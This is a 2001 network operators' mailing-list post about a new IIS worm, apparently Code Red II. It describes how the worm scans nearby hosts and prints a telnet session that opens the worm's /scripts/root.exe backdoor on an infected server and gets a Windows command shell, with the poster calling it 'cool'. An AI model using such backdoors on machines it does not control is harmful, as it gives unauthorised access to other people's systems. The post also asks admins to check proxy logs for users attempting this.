On Sun, Aug 05, 2001 at 11:39:27PM +1200, Perry Lorier wrote: It's a new worm using the same infection vector. It is a lot more aggressive, and uses the fact that machines near to itself are likely to be good places to find crackable machines. If you have a lot of customers with cracked NT boxes you'll get a lot of scans. If you have a nice C space in the middle of nowhere with no windows machines anywhere near, you might have a rather boring night. Hey, and it leaves a cool backdoor floating about. Look for recent infectors and telnet to them like such: cw:0(a)weta(cw)$ telnet x.x.x.x 80 Trying x.x.x.x... Connected to x.x.x.x. Escape character is '^]'. get /scripts/root.exe HTTP/0.9 HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 05 Aug 2001 11:39:46 GMT Content-Type: application/octet-stream Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. c:\inetpub\scripts> Cool :) Start grepping those proxy logs people for lusers attempting to do this (it won't work via a proxy anyhow, but that's no reason not to hunt down the offending luser and beat them senseless). --cw --------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog